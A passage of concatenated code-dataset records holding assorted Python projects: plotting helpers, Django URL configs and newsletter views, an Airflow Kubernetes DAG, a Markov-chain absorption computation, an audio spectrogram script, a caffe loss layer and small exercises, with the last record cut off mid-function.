plt.subplot(3,3,1),plt.imshow(thresh[4])\r\n plt.subplot(3,3,2),plt.imshow(thresh_eq[4])\r\n plt.subplot(3,3,3),plt.imshow(images[4])\r\n\r\n plt.subplot(3,3,4),plt.imshow(thresh[5])\r\n plt.subplot(3,3,5),plt.imshow(thresh_eq[5])\r\n plt.subplot(3,3,6),plt.imshow(images[5])\r\n\r\n plt.subplot(3,3,7),plt.imshow(thresh[6])\r\n plt.subplot(3,3,8),plt.imshow(thresh_eq[6])\r\n plt.subplot(3,3,9),plt.imshow(images[6])\r\n\r\n\r\n plt.show()\r\n\r\n plt.subplot(3,3,1),plt.imshow(morph_open[4])\r\n plt.subplot(3,3,2),plt.imshow(morph_close[4])\r\n plt.subplot(3,3,3),plt.imshow(images[4])\r\n\r\n plt.subplot(3,3,4),plt.imshow(morph_open[5])\r\n plt.subplot(3,3,5),plt.imshow(morph_close[5])\r\n plt.subplot(3,3,6),plt.imshow(images[5])\r\n\r\n plt.subplot(3,3,7),plt.imshow(morph_open[6])\r\n plt.subplot(3,3,8),plt.imshow(morph_close[6])\r\n plt.subplot(3,3,9),plt.imshow(images[6])\r\n\r\n plt.show()\r\n\r\n plt.subplot(4,2,1),plt.imshow(img_contours[0])\r\n plt.subplot(4,2,2),plt.imshow(img_contours[1])\r\n plt.subplot(4,2,3),plt.imshow(img_contours[2])\r\n plt.subplot(4,2,4),plt.imshow(img_contours[3])\r\n plt.subplot(4,2,5),plt.imshow(img_contours[4])\r\n plt.subplot(4,2,6),plt.imshow(img_contours[5])\r\n plt.subplot(4,2,7),plt.imshow(img_contours[6])\r\n\r\n plt.show()\r\n","sub_path":"Offset/offset.py","file_name":"offset.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149121381","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# set up matplotlib\nis_ipython = 'inline' in matplotlib.get_backend()\nif is_ipython:\n from IPython import display\n\n\ndef show_screen(screen, name):\n plt.figure(2)\n plt.imshow(screen.cpu().squeeze(0).permute(1, 2, 0).numpy(),\n interpolation='none')\n plt.title(name)\n plt.show()\n\ndef moving_average(x, w):\n return np.convolve(x, np.ones(w), 'valid') / w\n\n\ndef plot_scores(episode_scores, map_name=\"scores\"):\n plt.figure(1)\n plt.clf()\n # scores_t = torch.tensor(episode_scores, dtype=torch.float)\n plt.title('Training {}...'.format(map_name))\n plt.xlabel('Episode')\n plt.ylabel('Score')\n plt.plot(moving_average(episode_scores, 2))\n plt.plot(moving_average(episode_scores, 20))\n\n plt.pause(0.001) # pause a bit so that plots are updated\n if is_ipython:\n display.clear_output(wait=True)\n display.display(plt.gcf()) \n\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189573176","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path, re_path, include\nfrom . import views\n\nfrom users.forms import RegisterUserForm, ContinueAsGuestForm\nfrom users.views import (\n AuthFormsView,\n LoginView,\n LogoutView,\n # PasswordChangeView,\n # PasswordResetRequestView,\n)\nfrom users.views import anonymous_required\n\n\nurlpatterns = [\n # path(\n # \"password/reset/\",\n # PasswordResetRequestView.as_view(),\n # name=\"password-reset-request\",\n # ),\n # path(\"login/\", LoginView.as_view(), name=\"login\"),\n path(\n \"register/\",\n anonymous_required(AuthFormsView.as_view(form_class=RegisterUserForm)),\n name=\"register\",\n ),\n path(\n \"continue/\",\n anonymous_required(AuthFormsView.as_view(form_class=ContinueAsGuestForm)),\n name=\"continue-as-guest\",\n ),\n path(\"logout/\", LogoutView.as_view(), name=\"logout\"),\n #path(\"password/change/\", PasswordChangeView.as_view(), name=\"password-change\"),\n path(\n \"login/\",\n auth_views.LoginView.as_view(redirect_authenticated_user=True),\n name=\"login\",\n ),\n #path(\"logout/\", auth_views.LogoutView.as_view(), name=\"logout\"),\n # path(\"register/\", views.Register.as_view(), name=\"register\"),\n path(\"profile/\", views.profile, name=\"profile\"),\n path(\"\", include(\"django.contrib.auth.urls\")),\n]\n","sub_path":"django_shop/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406203062","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\nfrom harbin import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [ \n #url(r'^market.html$', TemplateView.as_view(template_name=\"market/market.html\")),\n \n\n #测试用\n url(r'test$',views.test, name='test'),\n\n #harbin接口\n url(r'get_split$',views.get_split, name='get_split'),\n url(r'get_lexical$',views.get_lexical, name='get_lexical'),\n url(r'get_dependency$',views.get_dependency, name='get_dependency'),\n url(r'get_mark$',views.get_mark, name='get_mark'),\n]\n","sub_path":"harbin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23601662","text":"from Block import *\n\nclass TestMine():\n def __init__(self, previousHash, data, difficulty):\n self.difficulty = difficulty\n b=Block(previousHash,data)\n newBlock=b.mineBlock(difficulty)\n print(\"start:\"+newBlock.bHash+\":end\")\n\n\ntm = TestMine(3);\n","sub_path":"testMine.py","file_name":"testMine.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"5065073","text":"from django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\ntry:\n from django.utils import simplejson\nexcept ImportError:\n import json as simplejson\nfrom postal.library import form_factory\nfrom postal.settings import POSTAL_USE_CRISPY_FORMS\n\n\ndef address_inline(request, prefix=\"\", country_code=None, template_name=\"postal/form.html\"):\n \"\"\" Displays postal address with localized fields \"\"\"\n country_prefix = \"country\"\n prefix = request.POST.get('prefix', prefix)\n\n if prefix:\n country_prefix = prefix + '-country'\n country_code = request.POST.get(country_prefix, country_code)\n postal_form_id = request.POST.get('postal-form-id', 'postal-address-form')\n\n form_class = form_factory(country_code=country_code)\n\n if request.method == \"POST\":\n data = {}\n for (key, val) in request.POST.items():\n if val is not None and len(val) > 0:\n data[key] = val\n data.update({country_prefix: country_code})\n\n form = form_class(prefix=prefix, initial=data, postal_form_id=postal_form_id)\n else:\n form = form_class(prefix=prefix, postal_form_id=postal_form_id)\n\n return render_to_string(\n template_name,\n context={\n \"form\": form,\n \"prefix\": prefix,\n },\n request=request\n )\n\n\ndef changed_country(request):\n if POSTAL_USE_CRISPY_FORMS:\n result = simplejson.dumps({\n \"postal_address\": address_inline(request, template_name=\"postal/crispyform.html\")\n })\n else:\n result = simplejson.dumps({\n \"postal_address\": address_inline(request),\n })\n return HttpResponse(result)","sub_path":"src/postal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397963574","text":"#%% Packages\n\n\nimport gc\nimport os\nimport pickle\n\nimport numpy as np\nfrom scipy.sparse import csc_matrix, dok_matrix, identity\nfrom scipy.special import comb\n\nfrom homeostatic.definitions import (\n absorption_matrix,\n birth_diagonal_matrices,\n death_diagonal_matrices,\n)\n\n#%% Parameters\n\n\nmu_value = 1.0\nn_mean_value = 10\ngamma_value = 1.0\nbase_stimulus = 10\nstimulus_value = [\n base_stimulus * gamma_value,\n base_stimulus * gamma_value,\n base_stimulus * gamma_value,\n]\n\n#%% Calculating distributions\n\n\nfor new_clone_is_soft in [True, False]:\n for sample_value in range(4):\n\n # Reading Samples and Variables\n\n probability_values = np.genfromtxt(\n f\"Samples/Matrices/Matrix-{sample_value}.csv\", delimiter=\",\"\n )\n dimension_value = probability_values.shape[0]\n\n if sample_value < 3:\n if new_clone_is_soft:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Soft.csv\", delimiter=\",\"\n )\n else:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Hard.csv\", delimiter=\",\"\n )\n else:\n if new_clone_is_soft:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Soft-(D).csv\", delimiter=\",\"\n )\n else:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Hard-(D).csv\", delimiter=\",\"\n )\n nu_value = nu_value * n_mean_value\n\n with open(\"Results/QSD/Truncated_levels.bin\", \"rb\") as file:\n truncated_levels = np.array(pickle.load(file))\n\n niche = 0\n if new_clone_is_soft:\n niche = 1\n max_level_value = (\n max(\n [\n max(truncated_levels[niche, :, i])\n for i in range(truncated_levels.shape[2])\n ]\n )\n + 15\n )\n\n # Solving matrix equations\n\n b_matrices = [] # Lis of upper diagonal (birth) matrices\n d_matrices = [] # List of lower diagonal (death) matrices\n a_matrices = [[] for _ in range(dimension_value)] # List of absorption matrices\n distribution = [\n [] for _ in range(dimension_value)\n ] # Distribution of absorption matrices\n\n # Calculating upper diagonal (birth) matrices\n\n for level_value in range(dimension_value, max_level_value):\n b_matrices.append(\n birth_diagonal_matrices(\n level_value,\n dimension_value,\n probability_values,\n stimulus_value,\n mu_value,\n nu_value,\n )\n )\n\n # Calculating lower diagonal (death) matrices\n\n for level_value in range(dimension_value + 1, max_level_value + 1):\n d_matrices.append(\n death_diagonal_matrices(\n level_value,\n max_level_value,\n dimension_value,\n probability_values,\n stimulus_value,\n mu_value,\n nu_value,\n )\n )\n\n # Calculating absorption matrices, all zero matrices are stored too\n\n for clone_number in range(dimension_value):\n for absorbing_level_value in range(dimension_value - 1, max_level_value):\n block_column = []\n for level_value in range(dimension_value, max_level_value + 1):\n if absorbing_level_value != level_value - 1:\n block_column.append(\n dok_matrix(\n (\n int(comb(level_value - 1, dimension_value - 1)),\n int(\n comb(\n absorbing_level_value - 1,\n dimension_value - 2,\n )\n ),\n )\n ).tocsc()\n )\n else:\n block_column.append(\n absorption_matrix(\n level_value,\n clone_number,\n max_level_value,\n dimension_value,\n mu_value,\n nu_value,\n probability_values,\n stimulus_value,\n )\n )\n a_matrices[clone_number].append(block_column)\n\n # Calculating the inverses of H matrices, and storing them in inverse order\n\n h_matrices = [identity(d_matrices[-1].shape[0], format=\"csc\")]\n\n for level_order in range(len(d_matrices)):\n gc.collect()\n matrix = identity(\n b_matrices[-(level_order + 1)].shape[0], format=\"csc\"\n ) - b_matrices[-(level_order + 1)].dot(\n h_matrices[-1].dot(d_matrices[-(level_order + 1)])\n )\n matrix = np.linalg.inv(matrix.todense())\n h_matrices.append(csc_matrix(matrix))\n\n for clone_number in range(dimension_value):\n for column_number in range(len(a_matrices[clone_number])):\n # Calculating K matrices for the *column_number* column, and storing them in inverse order\n k_matrices = [a_matrices[clone_number][column_number][-1]]\n for level_order in range(\n len(a_matrices[clone_number][column_number]) - 1\n ):\n k_matrices.append(\n b_matrices[-(level_order + 1)].dot(\n h_matrices[level_order].dot(k_matrices[-1])\n )\n + a_matrices[clone_number][column_number][-(level_order + 2)]\n )\n\n # Calculating the distribution of absorption sub-matrices for the *column_number* column\n distribution_column = [h_matrices[-1].dot(k_matrices[-1])]\n for level_order in range(len(k_matrices) - 1):\n matrix_term = (\n d_matrices[level_order].dot(distribution_column[-1])\n + k_matrices[-(level_order + 2)]\n )\n distribution_column.append(\n h_matrices[-(level_order + 2)].dot(matrix_term)\n )\n distribution[clone_number].append(distribution_column)\n\n # Storing Data\n\n folder = \"Hard\"\n if new_clone_is_soft:\n folder = \"Soft\"\n\n parameters_path = (\n f\"Results/Absorption distribution/{folder}/Parameters-{sample_value}.bin\"\n )\n data_path = f\"Results/Absorption distribution/{folder}/Data-{sample_value}.bin\"\n\n os.makedirs(os.path.dirname(parameters_path), exist_ok=True)\n os.makedirs(os.path.dirname(data_path), exist_ok=True)\n\n with open(parameters_path, \"wb\") as file:\n parameters = (\n [\n \"dimension_value\",\n \"max_level_value\",\n \"mu_value\",\n \"gamma_value\",\n \"stimulus_value\",\n ],\n dimension_value,\n max_level_value,\n mu_value,\n gamma_value,\n stimulus_value,\n )\n pickle.dump(parameters, file)\n\n with open(data_path, \"wb\") as file:\n pickle.dump(distribution, file)\n","sub_path":"Absorption-distribution.py","file_name":"Absorption-distribution.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"128419388","text":"#!/usr/bin/env python\n#!/usr/bin/python\n\nimport os, sys\nimport numpy as np \nimport scipy as sp\nimport wave\nimport struct\nimport matplotlib.pylab as pl\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('threshold', type = int, help = 'you need to provide an integer threshold')\nargs = parser.parse_args()\nthreshold = args.threshold\n\n# Open a file\npath = \"/home/ubuntu/src/tf_p27/tensorflow/tensorflow/clouder/dataset/audio\"\nout = \"/home/ubuntu/src/tf_p27/tensorflow/tensorflow/clouder/dataset/spectrogram\"\ndirs = os.listdir(path)\n\n# This would print all the files and directories\nfor dir in dirs:\n\tfiles = os.listdir(path + \"/\" + dir)\n\touts = os.listdir(out + \"/\" + dir)\n\tif len(files) == len(outs): continue\n\tprint(\"start processing... \" + dir)\n\tcount = 0\n\tfor file in files:\n\t\tif (file + \".png\") in outs: continue\n\t\tif not file.endswith(\".wav\"): continue\n\t\tif count >= threshold: sys.exit(0)\n\t\twinsize=512\n\t\tshift=256\n\t\tfh=600 \n\t\tfl=60 \n\t\tfilename = file\n\t\twavefile = wave.open(path + \"/\" + dir + \"/\" + filename, 'r') # open for writing\n\t\tnchannels = wavefile.getnchannels()\n\t\tsample_width = wavefile.getsampwidth()\n\t\tframerate = wavefile.getframerate()\n\t\tnumframes = wavefile.getnframes()\n\t\t# get wav_data\n\t\twav_data = wavefile.readframes(-1)\n\t\twav_data = np.fromstring(wav_data, 'Int16')\n\n\t\tTime=np.linspace(0, len(wav_data)/framerate, num=len(wav_data))\n\n\t\tpl.figure(1)\n\t\tpl.title('Signal Wave...')\n\t\tpl.plot(Time,wav_data)\n\t\tFs = framerate\n\t\tpl.figure(2)\n\t\tpl.subplots_adjust(left=0,right=1,bottom=0,top=1)\n\t\tpl.specgram(wav_data, NFFT=1024, Fs=Fs, noverlap=512)\n\t\tpl.axis('off')\n\t\tpl.axis('tight')\n\t\tpl.savefig(out + \"/\" + dir + '/%s.png' % filename)\n\t\tcount += 1\n\t\tprint(dir + \": \" + count + \" for this round\")","sub_path":"Course-Project/readWAVfiles.py","file_name":"readWAVfiles.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"517712541","text":"\"\"\"\nDefines the REST API views for users models.\n\"\"\"\n\n\nfrom core import views\nfrom app_organizations.api.group.serializers import (\n AddUserSerializer, OrganizationGroupCreateSerializer,\n OrganizationGroupListSerializer, OrganizationGroupRetrieveSerializer,\n OrganizationGroupUpdateSerializer, RemoveUserSerializer)\nfrom app_organizations.models import OrganizationGroup\nfrom app_organizations.permissions import OrganizationDjangoModelPermissions\nfrom app_organizations.views import (BaseOrganizationListGetQuerySet,\n BaseOrganizationRetrieveGetQuerySet)\n\n\nclass OrganizationGroupsListCreateDestroyView(\n views.CoreListAPIView,\n views.CoreCreateAPIView,\n views.CoreListDestroyAPIView,\n BaseOrganizationListGetQuerySet):\n \"\"\"\n Defines the list-create-destroy view.\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none()\n permission_classes = (OrganizationDjangoModelPermissions,)\n ordering_fields = ['name', 'authority']\n order_by = 'authority'\n # groups filtering with name conflicts with its lookup url name\n # filterset_fields = {\n # 'name': ['exact', 'icontains'],\n # }\n list_serializer = OrganizationGroupListSerializer\n create_serializer = OrganizationGroupCreateSerializer\n\n\nclass OrganizationGroupsRetrieveUpdateDestroyView(\n views.CoreRetrieveAPIView,\n views.CoreUpdateAPIView,\n views.CoreDestroyAPIView,\n BaseOrganizationRetrieveGetQuerySet):\n \"\"\"\n Defines the retrieve-update-destroy view.\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none() # Added for model permissions\n permission_classes = (OrganizationDjangoModelPermissions,)\n\n retrieve_serializer = OrganizationGroupRetrieveSerializer\n update_serializer = OrganizationGroupUpdateSerializer\n\n\nclass AddUserView(\n views.CoreUpdateAPIView,\n BaseOrganizationRetrieveGetQuerySet):\n \"\"\"\n Defines the view for adding users to the group\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none() # Added for model permissions\n permission_classes = (OrganizationDjangoModelPermissions,)\n update_serializer = AddUserSerializer\n\n\nclass RemoveUserView(\n views.CoreUpdateAPIView,\n BaseOrganizationRetrieveGetQuerySet):\n \"\"\"\n Defines the view for removing users from the group\n \"\"\"\n\n lookup_field = 'name'\n lookup_url_kwarg = 'name'\n queryset = OrganizationGroup.objects.none() # Added for model permissions\n permission_classes = (OrganizationDjangoModelPermissions,)\n update_serializer = RemoveUserSerializer\n","sub_path":"app_organizations/api/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324631155","text":"def main():\n n = int(input())\n a = list(map(int, input().split()))\n \n def solve():\n if 0 in a:\n return 0\n ans = 1\n for aa in a:\n ans *= aa\n if ans >10**18:\n return -1\n return ans\n print(solve())\n \n \nif __name__ == '__main__':\n main()","sub_path":"atcoder.jp/abc169/abc169_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440946008","text":"import logging\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator\n\nlog = logging.getLogger(__name__)\n\ndag = DAG(\n \"k8s_pod_operator\",\n schedule_interval=\"0 1 * * *\",\n catchup=False,\n default_args={\n \"owner\": \"admin\",\n \"depends_on_past\": False,\n \"start_date\": datetime(2020, 8, 7),\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 2,\n \"retry_delay\": timedelta(seconds=30),\n \"sla\": timedelta(hours=23),\n },\n)\n\nwith dag:\n task_1 = KubernetesPodOperator(\n image=\"ubuntu:16.04\",\n namespace=\"airflow-executor\", \n cmds=[\"bash\", \"-cx\"],\n arguments=[\"echo\", \"10\"],\n labels={\"foo\": \"bar\"},\n name=\"executor-task-1\",\n task_id=\"task-1-echo\",\n is_delete_operator_pod=False,\n in_cluster=True,\n )\n task_2 = KubernetesPodOperator(\n image=\"ubuntu:16.04\",\n namespace=\"airflow-executor\", \n cmds=[\"sleep\"],\n arguments=[\"300\"],\n labels={\"foo\": \"bar\"},\n name=\"executor-task-2\",\n task_id=\"task-2-sleep\",\n is_delete_operator_pod=False,\n in_cluster=True,\n )\n\ntask_1 >> task_2","sub_path":"dag/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"629380025","text":"\"\"\"\nQuestion 1:\nWrite a program to take the year as the input from the user. \nIf the current year is a leap year then print the day of the extra day in the year.\nIf the entered year is not a leap year, find the closest leap year either before or after the current year and then print the day of the extra day in the year. \n\nException case:\nIf the closest leap year either before or after is equidistant from the current year, print the day of the extra day in the year in both cases \n\nSample1:\nInput: 2012\nOutput:\nWednesday\n\nSample2:\nInput: 2013\nOutput:\nThis is not a leap year\nClosest leap year: 2012\nWednesday\n\n\"\"\"\n\nimport datetime\n\ndef find_day(num):\n \"\"\" Returns day \"\"\"\n lst = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n return lst[num]\n\ndef find_date(year):\n \"\"\" creates date & calls find_day to get Day\"\"\"\n dateobj = datetime.date(year, 2, 29)\n num = dateobj.weekday()\n return find_day(num)\n\ndef find_leap_year(year):\n \"\"\" Finds Closest Leap Year\"\"\"\n if year%100==0 and year%400 != 0:\n year1 = year+4\n year2 = year-4\n print(\"year {} is a leap year\".format(year1))\n print(\"year {} is a leap year\".format(year2))\n print(find_date(year1))\n print(find_date(year2))\n else:\n if year%4 >2:\n year = year + (4-year%4)\n if year%100==0 and year%400 != 0:\n year = year - 4\n print(\"year {} is a leap year\".format(year))\n print(find_date(year))\n elif year%4 < 2:\n year = year - (year%4)\n if year%100==0 and year%400 != 0:\n year = year + 4\n print(\"year {} is a leap year\".format(year))\n print(find_date(year))\n else:\n flag1 = False\n flag2 = False\n year1 = year - 2\n year2 = year + 2\n if year%100==0 and year%400 != 0:\n flag1 = True\n if year%100==0 and year%400 != 0:\n flag2 = True \n if flag1 == False and flag2 == False:\n print(\"Leap year is equidistant from given year\")\n print(\"So two leap years are {0} and {1}\".format(year1, year2))\n print(find_date(year1))\n print(find_date(year2))\n elif flag1 == True:\n print(\"year {} is a leap year\".format(year2))\n print(find_date(year2))\n elif flag2 == True:\n print(\"year {} is a leap year\".format(year1))\n print(find_date(year1))\n\ndef check_leap_year(year):\n \"\"\" Checks Leap Year\"\"\"\n if year%100==0 and year%400 != 0:\n print(\"year {} is not a leap year\".format(year))\n find_leap_year(year)\n else:\n if year%4 == 0:\n print(\"year {} is leap year\".format(year))\n print(find_date(year))\n else:\n print(\"year {} is not a leap year\".format(year))\n find_leap_year(year)\n\n\n\nif __name__ == '__main__':\n year = int(input())\n check_leap_year(year)","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114234095","text":"import os\nimport sys\n\n# Import environments\nImport('opt','debug')\n\n# Make copies of imported environment to keep changes local\nopt = opt.Clone()\ndebug = debug.Clone()\n\n# Specialize debug environment\ndebug['CCFLAGS'] += ['-fopenmp']\ndebug.VariantDir('debug-build', '.', duplicate=0)\ndebug_src = debug.Glob('debug-build/*.c')\ndebug.Program('test-debug.out', source = debug_src)\nClean('.','debug-build')\n\n# Specialize opt environment\nopt['CCFLAGS'] += ['-fopenmp']\nopt.VariantDir('opt-build', '.', duplicate=0)\nopt_src = opt.Glob('opt-build/*.c')\nopt.Program('test-opt.out', source = opt_src)\nClean('.','opt-build')\n","sub_path":"tests/omp_atomic/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575610790","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\nPACKAGE = 'aftracistan'\nVERSION = '0.1'\n\nsetup( name=PACKAGE, version=VERSION,\n author = 'John Hampton',\n author_email = 'pacopablo@asylumware.com',\n url = 'http://trac-hacks.org/wiki/TraciStanPlugin',\n description = \"\"\"\nExample plugin showing the use of the IStanRequestHandler\n\"\"\",\n license='BSD',\n\n packages = ['aftracistan'],\n package_data = { 'aftracistan' : ['htdocs/css/*.css', 'htdocs/img/*',\n 'templates/*.stan', ]},\n entry_points = {'trac.plugins': ['aftracistan = aftracistan']},\n install_requires = ['TracIStan']\n)\n","sub_path":"tracistanplugin/0.9/example/aftracistan/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"198788560","text":"#!/usr/bin/env python3\n\nwhile True:\n line = input()\n #print(f\"# BOT: line={line}\")\n if line[0] == '#': # this is a commented line (sent by the service server)\n if '# WE HAVE FINISHED' == line:\n exit(0) # exit upon termination of the service server\n else:\n n = int(line)\n print(f\"{n//2} {(n+1)//2}\")\n","sub_path":"example_problems/tutorial/sum/bots/python/without_library/free_sum_mymaxproductbot.py","file_name":"free_sum_mymaxproductbot.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434243963","text":"import caffe\nimport numpy as np\nimport random\nimport xml.etree.ElementTree as et\n##############################################################################################################\n##############################################################################################################\n##############################################################################################################\nclass smoothL1Loss(caffe.Layer):\n\tdef setup(self,bottom,top):\n\t\tself.lambda_ = 10.0\n\t\tself.mini_batch = 256\n\n\tdef reshape(self,bottom,top):\n\t\ttop[0].reshape(1)\n\n\tdef forward(self,bottom,top):\n\t\tt_predict \t= bottom[0].data\n\t\tt_gt \t= bottom[1].data\n\t\tself.reg_p\t= bottom[2].data\n\t\tfeature_h,feature_w = self.reg_p.shape[-2:]\n\t\tself.feature_size = feature_h*feature_w\n\t\tself.diff = t_predict - t_gt\n\t\tloss = (self.lambda_/self.feature_size)*self.reg_p*self.smoothL1(self.diff)\n\t\ttop[0].data[...] = np.sum(loss)\n\n\tdef backward(self, top, propagate_down, bottom):\n\t\tif propagate_down[0]:\n\t\t\tbottom[0].diff[...] = (self.lambda_/self.feature_size)*self.reg_p*self.smoothL1_gradient(self.diff)\n\t\tif propagate_down[1]:\n\t\t\tbottom[1].diff[...] = -(self.lambda_/self.feature_size)*self.reg_p*self.smoothL1_gradient(self.diff)\n\n\tdef smoothL1(self,x):\n\t\ty = np.zeros_like(x) #(1,36,x,y)\n\t\td1,d2,d3,d4 = x.shape\n\t\tfor d1_ in range(d1):\n\t\t\tfor d2_ in range(d2):\n\t\t\t\tfor d3_ in range(d3):\n\t\t\t\t\tfor d4_ in range(d4):\n\t\t\t\t\t\tx_ = x[d1_][d2_][d3_][d4_]\n\t\t\t\t\t\tif x_> 1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = x_-0.5\n\t\t\t\t\t\telif x_<-1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = -x_-0.5\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = 0.5*x_*x_\n\t\treturn y\n\tdef smoothL1_gradient(self,x):\n\t\ty = np.zeros_like(x) #(1,36,x,y)\n\t\td1,d2,d3,d4 = x.shape\n\t\tfor d1_ in range(d1):\n\t\t\tfor d2_ in range(d2):\n\t\t\t\tfor d3_ in range(d3):\n\t\t\t\t\tfor d4_ in range(d4):\n\t\t\t\t\t\tx_ = x[d1_][d2_][d3_][d4_]\n\t\t\t\t\t\tif x_> 1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = 1\n\t\t\t\t\t\telif x_<-1:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = -1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ty[d1_][d2_][d3_][d4_] = x_\n\t\treturn y\n","sub_path":"python/smoothL1Loss.py","file_name":"smoothL1Loss.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465449785","text":"#!/usr/bin/python\r\ns = [\"A\", \"A\", \"A\", \"A\", \"C\", \"C\", \"C\", \"G\", \"G\", \"T\"]\r\ns = ''.join(s)\r\npairs = {\r\n \"A\": \"T\",\r\n \"T\": \"A\",\r\n \"G\": \"C\",\r\n \"C\": \"G\"\r\n}\r\nc = []\r\nfor i in range(0, len(s), 1):\r\n c.append(pairs[s[i]])\r\nprint(list(reversed(c)))\r\n\r\n\r\nv = \"AAAACCCGGT\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignments/Assignment3.py","file_name":"Assignment3.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"12824033","text":"# -*- coding: utf-8 -*-\n# Create your views here.\n\nfrom newsletter.models import *\nfrom django.template.loader import get_template\nfrom django.views.generic.simple import redirect_to\nfrom django.shortcuts import render_to_response\nfrom django.core.mail import send_mail\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nimport datetime\nimport subprocess\nimport random\n\ndef gen_code():\n code = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890') for i in range(10)])\n return code\n\ndef subscribe(request):\n if not request.POST:\n return redirect_to(request, url='/') \n email = request.POST['email']\n mlist = [].append(email)\n code = gen_code()\n subscription_date = datetime.datetime.now()\n subscr = Subscriber(email=email, code=code, subscription_date=subscription_date)\n subscr.save()\n# body=u\"\"\"Otrzymałeś ten list, ponieważ na stronie www.nspj.bydgoszcz.pl podano Twój adres do wysyłki newslettera. Jeśli chcesz otrzymywać newsletter kliknij na link lub wklej poniższy adres do przeglądarki, żeby potwierdzić subskrypcję.Jeśli nie wpisywałeś swojego adresu po prostu wykasuj ten mail. \\n\"\"\" \n# body = body + \"http://www.nspj.bydgoszcz.pl/newsletter/accept/?code=\" + code\n# send_mail(\"Newsletter ze strony pjn-kujawskopomorskie.pl\",\n# body,\n# 'biuro@nspj.bydgoszcz.pl',\n# mlist\n# )\n komunikat = u\"\"\"Dziękujemy za wpisanie adresu. Newsletter będzie wysyłany na adres \"\"\" + email\n \n return render_to_response('subscribed.html', RequestContext(request, {\"komunikat\":komunikat} ))\n\ndef unsubscribe(request):\n if not request.GET['email']:\n return redirect_to(request, url='/')\n email = request.GET['email']\n subscr = Subscriber.objects.filter(email=email)\n n = subscr.count()\n for s in subscr:\n s.delete()\n 